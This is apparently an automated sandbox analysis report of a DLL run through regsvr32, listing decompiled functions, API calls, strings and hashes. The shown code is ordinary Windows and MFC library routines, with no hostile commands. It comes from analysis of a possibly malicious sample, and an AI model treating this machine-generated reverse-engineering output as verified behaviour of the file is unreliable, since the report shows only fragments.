0x1001692d
0x10016930
0x10016933
0x10016936
0x10016939
0x1001693c
0x1001693f
0x1001694e
0x10016957
0x10016961
0x1001696b
0x10016970
0x10016972
0x10016973
0x10016981
0x10016984
0x10016986
0x1001698e
0x10016991
0x10016998
0x100169a0
0x100169a7
0x100169aa
0x100169b1
0x100169b9
0x100169c0
0x100169c3
0x100169ca
0x100169d2
0x100169d9
0x100169e0
0x100169f0
0x100169f8
0x10016a26
0x10016a29
0x00000000
0x100169fa
0x100169fd
0x10016a06
0x10016a0f
0x10016a18
0x00000000
0x10016a1d
0x00000000
0x100169f8
0x10016a30
0x10016a40
0x10016a4f
0x10016a5f
0x10016a64
0x10016a7c
0x10016a87
0x10016a8f
0x10016a93
0x10016a9b
0x10016aa3
0x10016aab
0x10016ab3
0x10016ab3
0x10016903
0x10016905
0x10016905
0x10016901
0x100168f9
0x10016b15
0x10016b1a
0x10016b23

APIs

__EH_prolog.LIBCMT ref: 100168BF
SafeArrayGetDim.OLEAUT32(?), ref: 100168E9
SafeArrayGetDim.OLEAUT32(00000000), ref: 100168F3
SafeArrayGetElemsize.OLEAUT32(?), ref: 10016914
SafeArrayGetElemsize.OLEAUT32(00000000), ref: 1001691C
SafeArrayGetLBound.OLEAUT32(?,?,?), ref: 10016991
SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 100169AA
SafeArrayGetUBound.OLEAUT32(?,?,?), ref: 100169C3
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 100169D9

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$Bound$Elemsize$H_prolog
String ID:
API String ID: 779546493-0
Opcode ID: 949e0566fb67cb26a74ceb3480afc1a4660c2f5ee522e6f899412f3d80873a07
Instruction ID: 4f62b7e9832fa3257745ec803ff6d592f90800d63598459f9554b471c5e8cb9d
Opcode Fuzzy Hash: 949e0566fb67cb26a74ceb3480afc1a4660c2f5ee522e6f899412f3d80873a07
Instruction Fuzzy Hash: 82513C76D00219AFDF14DFB4DC858AE7FB9EF48350B204426F805EB261EB35A980DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1002D920 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002D920(intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _v4;
				_Unknown_base(*)()* _t8;
				signed int _t9;
				signed short _t19;
				intOrPtr _t21;

				if(_a8 == 1) {
					_t8 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "DisableThreadLibraryCalls");
					_t21 = _a4;
					_v4 = _t8;
					if(_t8 != 0) {
						_v4(_t21);
					}
					EnterCriticalSection(0x10096ac0);
					 *0x10096d3c = _t21;
					 *0x10096d38 = _t21;
					_t9 = GetVersion();
					_t19 = (_t9 & 0x000000ff) << 0x00000008 | _t9 & 0x000000ff;
					 *0x10096d40 = _t19;
					if((_t9 & 0x80000000) == 0) {
						L5:
						 *0x10096d42 = 0x20;
					} else {
						 *0x10096d42 = 0x10;
						if(_t19 >= 0x35f) {
							goto L5;
						}
					}
					 *0x10097814 = GetSystemMetrics(7) - 1;
					 *0x10097818 = GetSystemMetrics(8) - 1;
					 *0x1009781c = GetSystemMetrics(4);
					 *0x10097820 = GetSystemMetrics(0x1e);
					LeaveCriticalSection(0x10096ac0);
				}
				return 1;
			}

0x1002d929
0x1002d940
0x1002d946
0x1002d94a
0x1002d950
0x1002d953
0x1002d953
0x1002d95c
0x1002d962
0x1002d968
0x1002d96e
0x1002d980
0x1002d988
0x1002d98f
0x1002d9a1
0x1002d9a1
0x1002d991
0x1002d991
0x1002d99f
0x00000000
0x00000000
0x1002d99f
0x1002d9b7
0x1002d9c1
0x1002d9ca
0x1002d9d6
0x1002d9db
0x1002d9db
0x1002d9ea

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 1002D934
GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 1002D940
EnterCriticalSection.KERNEL32(10096AC0), ref: 1002D95C
GetVersion.KERNEL32 ref: 1002D96E
GetSystemMetrics.USER32 ref: 1002D9B2
GetSystemMetrics.USER32 ref: 1002D9BC
GetSystemMetrics.USER32 ref: 1002D9C6
GetSystemMetrics.USER32 ref: 1002D9CF
LeaveCriticalSection.KERNEL32(10096AC0), ref: 1002D9DB

Strings

KERNEL32.DLL, xrefs: 1002D92F
DisableThreadLibraryCalls, xrefs: 1002D93A

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
String ID: DisableThreadLibraryCalls$KERNEL32.DLL
API String ID: 1414939872-3863293605
Opcode ID: 36c6a6facd3acf08a55fe7db8dce2c3f7ab6f76849d0c241b6ed1ad1aa7969b3
Instruction ID: 5a680bb2272caf3b06c97f0632708a1ab89f771483ce9d1b4cd34ef8a2bb5561
Opcode Fuzzy Hash: 36c6a6facd3acf08a55fe7db8dce2c3f7ab6f76849d0c241b6ed1ad1aa7969b3
Instruction Fuzzy Hash: DB11A070815336ABFB18BB249C8C68A3BA0FF44340F40842BF94D97270DB368844DF82

Uniqueness

Uniqueness Score: -1.00%

Function 1004945C Relevance: 18.1, APIs: 12, Instructions: 119
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1004945C(void* __esi, CHAR* _a4, intOrPtr* _a8) {
				signed int _v8;
				FILETIME* _v12;
				FILETIME* _v16;
				char _v24;
				char _v32;
				struct _FILETIME _v40;
				long _t33;
				long _t34;
				void* _t35;
				long _t36;
				void* _t40;
				struct _SECURITY_ATTRIBUTES* _t70;
				void* _t71;
				void* _t72;
				intOrPtr* _t73;

				_t72 = __esi;
				_t70 = 0;
				_v16 = 0;
				_v12 = 0;
				_t33 = GetFileAttributesA(_a4);
				_v8 = _t33;
				if(_t33 == 0xffffffff) {
					E10048CC6(GetLastError(), 0);
				}
				_push(_t72);
				_t73 = _a8;
				_t34 =  *(_t73 + 0x10) & 0x000000ff;
				if(_t34 != _v8 && (_v8 & 0x00000001) != 0 && SetFileAttributesA(_a4, _t34) == 0) {
					E10048CC6(GetLastError(), _t70);
				}
				_t35 = _t73 + 4;
				if( *((intOrPtr*)(_t73 + 4)) != _t70) {
					E100493A9(_t35,  &_v40);
					_t40 = _t73 + 8;
					if( *((intOrPtr*)(_t73 + 8)) != _t70) {
						E100493A9(_t40,  &_v24);
						_v12 =  &_v24;
					}
					if( *_t73 != _t70) {
						E100493A9(_t73,  &_v32);
						_v16 =  &_v32;
					}
					_t71 = CreateFileA(_a4, 0xc0000000, 1, _t70, 3, 0x80, _t70);
					if(_t71 == 0xffffffff) {
						E10048CC6(GetLastError(), 0);
					}
					if(SetFileTime(_t71, _v16, _v12,  &_v40) == 0) {
						E10048CC6(GetLastError(), _t43);
					}
					if(CloseHandle(_t71) == 0) {
						E10048CC6(GetLastError(), _t44);
					}
					_t70 = 0;
				}
				_t36 =  *(_t73 + 0x10) & 0x000000ff;
				if(_t36 != _v8 && (_v8 & 0x00000001) == 0) {
					_t36 = SetFileAttributesA(_a4, _t36);
					if(_t36 == 0) {
						return E10048CC6(GetLastError(), _t70);
					}
				}
				return _t36;
			}

0x1004945c
0x10049467
0x10049469
0x1004946c
0x1004946f
0x1004947e
0x10049481
0x10049487
0x10049487
0x1004948c
0x1004948d
0x10049490
0x10049497
0x100494b1
0x100494b1
0x100494b9
0x100494bc
0x100494c7
0x100494cf
0x100494d4
0x100494db
0x100494e5
0x100494e5
0x100494ea
0x100494f1
0x100494fb
0x100494fb
0x10049517
0x1004951c
0x10049523
0x10049523
0x1004953b
0x10049541
0x10049541
0x1004954f
0x10049555
0x10049555
0x1004955a
0x1004955a
0x1004955c
0x10049564
0x10049570
0x10049578
0x00000000
0x1004957e
0x10049578
0x10049586

APIs

GetFileAttributesA.KERNEL32(?), ref: 1004946F
GetLastError.KERNEL32(00000000), ref: 10049484
SetFileAttributesA.KERNEL32(?,?), ref: 100494A3
GetLastError.KERNEL32(00000000), ref: 100494AE
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 10049511
GetLastError.KERNEL32(00000000), ref: 10049520
SetFileTime.KERNEL32(00000000,?,?,?), ref: 10049533
GetLastError.KERNEL32(00000000), ref: 1004953E
CloseHandle.KERNEL32(00000000), ref: 10049547
GetLastError.KERNEL32(00000000), ref: 10049552
SetFileAttributesA.KERNEL32(?,?), ref: 10049570
GetLastError.KERNEL32(00000000), ref: 1004957B

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast$File$Attributes$CloseCreateHandleTime
String ID:
API String ID: 3867745407-0
Opcode ID: 6896237430619a51f5df634e849be18f0e6644a98f3fd263f520b62b794104f7
Instruction ID: 88063242f9f52d7174b73ef7afb68d0a6dc9171e2ea60002ac71e96442262384
Opcode Fuzzy Hash: 6896237430619a51f5df634e849be18f0e6644a98f3fd263f520b62b794104f7
Instruction Fuzzy Hash: D2316F71800209AEEB11DFB5CD89EAE7BFCEF84394F20453AF455E2090D734EA419B24

Uniqueness

Uniqueness Score: -1.00%

Function 10062EA7 Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 66
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10062EA7(void* __ecx, CHAR* _a4) {
				int _t10;
				int _t11;
				int _t12;
				int _t15;
				void* _t16;
				void* _t17;
				CHAR* _t18;
				void* _t21;

				_t18 = _a4;
				_t21 = __ecx;
				_t10 = lstrcmpA(_t18, "pt");
				if(_t10 == 0) {
					 *((intOrPtr*)(_t21 + 0x10)) = 3;
					return _t10;
				}
				_t11 = lstrcmpA(_t18, "p");
				if(_t11 == 0) {
					 *((intOrPtr*)(_t21 + 0x10)) = 2;
					return _t11;
				}
				_t12 = lstrcmpiA(_t18, "Unregister");
				if(_t12 == 0) {
					L13:
					 *((intOrPtr*)(_t21 + 0x10)) = 5;
					return _t12;
				}
				_t12 = lstrcmpiA(_t18, "Unregserver");
				if(_t12 == 0) {
					goto L13;
				}
				if(lstrcmpA(_t18, "dde") == 0) {
					_t17 = L1005E7BC(_t13);
					 *((intOrPtr*)(_t21 + 0x10)) = 4;
					return _t17;
				}
				if(lstrcmpiA(_t18, "Embedding") == 0) {
					_t16 = L1005E7BC(_t14);
					 *((intOrPtr*)(_t21 + 8)) = 1;
					L12:
					 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
					return _t16;
				}
				_t15 = lstrcmpiA(_t18, "Automation");
				if(_t15 == 0) {
					_t16 = L1005E7BC(_t15);
					 *((intOrPtr*)(_t21 + 0xc)) = 1;
					goto L12;
				}
				return _t15;
			}

0x10062ea8
0x10062eba
0x10062ebd
0x10062ec1
0x10062ec3
0x00000000
0x10062ec3
0x10062ed5
0x10062ed9
0x10062edb
0x00000000
0x10062edb
0x10062ef0
0x10062ef4
0x10062f57
0x10062f57
0x00000000
0x10062f57
0x10062efc
0x10062f00
0x00000000
0x00000000
0x10062f0c
0x10062f0f
0x10062f14
0x00000000
0x10062f14
0x10062f27
0x10062f2a
0x10062f2f
0x10062f51
0x10062f51
0x00000000
0x10062f51
0x10062f3e
0x10062f42
0x10062f45
0x10062f4a
0x00000000
0x10062f4a
0x10062f62

APIs

lstrcmpA.KERNEL32(00000000,1007B9BC,?,?,?,?,10062E91,00000000), ref: 10062EBD
lstrcmpA.KERNEL32(00000000,1007B9B8,?,?,?,?,10062E91,00000000), ref: 10062ED5

Strings

Automation, xrefs: 10062F38
Unregserver, xrefs: 10062EF6
dde, xrefs: 10062F02
Unregister, xrefs: 10062EEA
Embedding, xrefs: 10062F1D

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrcmp
String ID: Automation$Embedding$Unregister$Unregserver$dde
API String ID: 1534048567-1842294661
Opcode ID: 3746f7e5c05a5d35767e87af06b62e5f4565df7b182c088ab666391010fc7a92
Instruction ID: 4d3317b1d0fd05bd23d111d7d4d7d6f732619182e536243a11dea14291d84e66
Opcode Fuzzy Hash: 3746f7e5c05a5d35767e87af06b62e5f4565df7b182c088ab666391010fc7a92
Instruction Fuzzy Hash: 721169B1104F0666D220DB718C48F4777FEEF50394F01C939B7A9B6141D77EE4494668

Uniqueness

Uniqueness Score: -1.00%

Function 10047E11 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 194
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10047E11(void* __ecx) {
				char _t92;
				signed int _t94;
				int _t98;
				int _t101;
				signed int _t105;
				CHAR* _t106;
				signed int _t109;
				void* _t117;
				CHAR** _t119;
				intOrPtr* _t139;
				void* _t141;
				signed int _t142;
				intOrPtr _t143;
				CHAR* _t148;
				CHAR* _t153;
				signed int _t155;
				signed int _t166;
				signed char _t171;
				signed int _t172;
				void* _t176;
				CHAR* _t179;
				void* _t181;
				void* _t183;
				void* _t184;

				E1001A9E0(0x100778ac, _t181);
				_t184 = _t183 - 0x124;
				_t179 =  *(_t181 + 8);
				_t176 = __ecx;
				_t92 = _t179[0xc];
				_t139 = __ecx + 0x1c;
				 *(_t181 - 0x18) = _t92;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) - 8)) == 0) {
					_t187 = _t92;
					if(_t92 != 0) {
						 *(_t181 + 8) = _t179[4];
						GetMenuStringA( *( *(_t181 - 0x18) + 4),  *(_t181 + 8), E10045D4E(_t139, _t181, 0x100), 0x100, 0);
						E10045D9D(_t139, _t187, 0xffffffff);
					}
				}
				_t94 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t176 + 8)))) - 8)) != 0) {
					__eflags = _t179[0xc];
					if(_t179[0xc] == 0) {
						goto L23;
					}
					_t141 = 0;
					__eflags =  *(_t176 + 4);
					if( *(_t176 + 4) <= 0) {
						L10:
						GetCurrentDirectoryA(0x104, _t181 - 0x130);
						_t98 = lstrlenA(_t181 - 0x130);
						_t148 =  *0x1008f630; // 0x1008f644
						 *((char*)(_t181 + _t98 - 0x130)) = 0x5c;
						 *(_t181 + _t98 - 0x12f) =  *(_t181 + _t98 - 0x12f) & 0x00000000;
						_t99 = _t98 + 1;
						 *(_t181 - 0x18) = _t98 + 1;
						 *(_t181 - 0x14) = _t148;
						_t142 = 0;
						 *(_t181 - 0x10) = _t148;
						 *(_t181 - 4) = 0;
						__eflags =  *(_t176 + 4);
						 *(_t181 - 4) = 1;
						if( *(_t176 + 4) <= 0) {
							L22:
							_t179[8] = _t179[8] - 1;
							_t101 = GetMenuItemCount( *(_t179[0xc] + 4));
							 *(_t181 - 4) =  *(_t181 - 4) & 0x00000000;
							_t179[0x20] = _t101;
							_t179[0x18] = 1;
							E1004591E(_t181 - 0x10);
							_t86 = _t181 - 4;
							 *_t86 =  *(_t181 - 4) | 0xffffffff;
							__eflags =  *_t86;
							_t94 = E1004591E(_t181 - 0x14);
							goto L23;
						}
						while(1) {
							_t105 = E10047D0B(_t176, _t181 - 0x14, _t142, _t181 - 0x130, _t99, 1);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L22;
							}
							_t106 =  *(_t181 - 0x14);
							 *(_t181 + 8) = _t106;
							__eflags =  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8));
							_t109 = E10045D4E(_t181 - 0x10, _t181,  *((intOrPtr*)(_t106 - 8)) +  *((intOrPtr*)(_t106 - 8)));
							_t153 =  *(_t181 + 8);
							while(1) {
								_t166 =  *_t153;
								__eflags = _t166;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t166 - 0x26;
								if(_t166 == 0x26) {
									 *_t109 = _t166;
									_t109 = _t109 + 1;
									__eflags = _t109;
								}
								_t171 =  *_t153;
								 *(_t181 + 0xb) = _t171;
								_t172 = _t171 & 0x000000ff;
								__eflags =  *(_t172 + 0x10096981) & 0x00000004;
								if(( *(_t172 + 0x10096981) & 0x00000004) != 0) {
									 *_t109 =  *(_t181 + 0xb);
									_t109 = _t109 + 1;
									_t153 =  &(_t153[1]);
									__eflags = _t153;
								}
								 *_t109 =  *_t153;
								_t109 = _t109 + 1;
								_t153 =  &(_t153[1]);
							}
							 *_t109 =  *_t109 & 0x00000000;
							E10045D9D(_t181 - 0x10, __eflags, 0xffffffff);
							_t155 = 0xa;
							_push(( *((intOrPtr*)(_t176 + 0x14)) + _t142 + 1) % _t155);
							wsprintfA(_t181 - 0x2c, "&%d ");
							_t184 = _t184 + 0xc;
							_t117 = E1004598C(_t181 - 0x20, _t181, _t181 - 0x2c);
							 *(_t181 - 4) = 2;
							_push(_t181 - 0x10);
							_push(_t117);
							_push(_t181 - 0x1c);
							_t119 = E10045B4D(_t181 - 0x10, __eflags);
							_t158 = _t179[8];
							 *(_t181 + 8) =  *_t119;
							_t121 = _t179[4];
							_t67 = _t158 + 1; // 0x1
							_t179[8] = _t67;
							_t69 = _t121 + 1; // 0x3
							_t179[4] = _t69;
							InsertMenuA( *(_t179[0xc] + 4), _t179[8], 0x400, _t179[4],  *(_t181 + 8));
							E1004591E(_t181 - 0x1c);
							 *(_t181 - 4) = 1;
							E1004591E(_t181 - 0x20);
							_t142 = _t142 + 1;
							__eflags = _t142 -  *(_t176 + 4);
							if(_t142 <  *(_t176 + 4)) {
								_t99 =  *(_t181 - 0x18);
								continue;
							}
							goto L22;
						}
						goto L22;
					} else {
						goto L9;
					}
					do {
						L9:
						DeleteMenu( *(_t179[0xc] + 4), _t179[4] + _t141, 0);
						_t141 = _t141 + 1;
						__eflags = _t141 -  *(_t176 + 4);
					} while (_t141 <  *(_t176 + 4));
					goto L10;
				} else {
					_t143 =  *_t139;
					if( *((intOrPtr*)(_t143 - 8)) != 0) {
						 *((intOrPtr*)( *_t179 + 0xc))(_t143);
					}
					_t94 =  *( *_t179)(0);
					L23:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					return _t94;
				}
			}

0x10047e16
0x10047e1b
0x10047e23
0x10047e27
0x10047e2c
0x10047e2f
0x10047e32
0x10047e39
0x10047e3b
0x10047e3d
0x10047e44
0x10047e5f
0x10047e69
0x10047e69
0x10047e3d
0x10047e73
0x10047e78
0x10047e96
0x10047e99
0x00000000
0x00000000
0x10047e9f
0x10047ea1
0x10047ea4
0x10047ec0
0x10047ecc
0x10047ed9
0x10047edf
0x10047ee5
0x10047eed
0x10047ef5
0x10047ef6
0x10047ef9
0x10047efc
0x10047efe
0x10047f01
0x10047f04
0x10047f07
0x10047f0b
0x10048010
0x10048013
0x10048019
0x1004801f
0x10048026
0x10048029
0x10048030
0x10048035
0x10048035
0x10048035
0x1004803c
0x00000000
0x1004803c
0x10047f16
0x10047f27
0x10047f2c
0x10047f2e
0x00000000
0x00000000
0x10047f34
0x10047f3a
0x10047f40
0x10047f43
0x10047f48
0x10047f4b
0x10047f4b
0x10047f4d
0x10047f4f
0x00000000
0x00000000
0x10047f51
0x10047f54
0x10047f56
0x10047f58
0x10047f58
0x10047f58
0x10047f59
0x10047f5b
0x10047f5e
0x10047f61
0x10047f68
0x10047f6d
0x10047f6f
0x10047f70
0x10047f70
0x10047f70
0x10047f73
0x10047f75
0x10047f76
0x10047f76
0x10047f79
0x10047f81
0x10047f8d
0x10047f97
0x10047f9e
0x10047fa4
0x10047fae
0x10047fb6
0x10047fba
0x10047fbb
0x10047fbf
0x10047fc0
0x10047fc7
0x10047fca
0x10047fcd
0x10047fd3
0x10047fd6
0x10047fd9
0x10047fe6
0x10047fec
0x10047ff5
0x10047ffd
0x10048001
0x10048006
0x10048007
0x1004800a
0x10047f13
0x00000000
0x10047f13
0x00000000
0x1004800a
0x00000000
0x00000000
0x00000000
0x00000000
0x10047ea6
0x10047ea6
0x10047eb4
0x10047eba
0x10047ebb
0x10047ebb
0x00000000
0x10047e7a
0x10047e7a
0x10047e7f
0x10047e86
0x10047e86
0x10047e8f
0x10048041
0x10048047
0x1004804f
0x1004804f

APIs

__EH_prolog.LIBCMT ref: 10047E16
GetMenuStringA.USER32 ref: 10047E5F

Part of subcall function 10045D9D: lstrlenA.KERNEL32(?,?,10037008,000000FF), ref: 10045DB0

Part of subcall function 10045B4D: __EH_prolog.LIBCMT ref: 10045B52

DeleteMenu.USER32 ref: 10047EB4
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10047ECC
lstrlenA.KERNEL32(?), ref: 10047ED9
wsprintfA.USER32 ref: 10047F9E
GetMenuItemCount.USER32(00000001), ref: 10048019
InsertMenuA.USER32(00000002,00000000,00000400,00000002,00000000), ref: 10047FEC

Part of subcall function 1004591E: InterlockedDecrement.KERNEL32(-000000F4), ref: 10045932

Strings

&%d , xrefs: 10047F98
\, xrefs: 10047EE5

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
